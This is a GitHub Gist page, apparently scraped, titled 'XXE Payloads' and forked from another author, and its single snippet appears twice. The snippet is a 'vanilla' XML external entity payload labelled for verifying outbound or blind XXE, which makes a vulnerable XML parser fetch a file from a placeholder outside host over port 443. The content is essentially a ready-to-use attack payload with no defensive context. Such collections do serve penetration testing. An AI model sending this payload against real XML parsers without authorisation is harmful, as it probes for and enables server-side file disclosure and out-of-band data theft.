Skip to content

Instantly share code, notes, and snippets.

View Lucifaer's full-sized avatar
🤐
Researching

Lucifaer Lucifaer

🤐
Researching
View GitHub Profile
@Lucifaer
Lucifaer / XXE_payloads
Created July 18, 2017 03:46 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@Lucifaer
Lucifaer / XXE_payloads
Created July 18, 2017 03:46 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>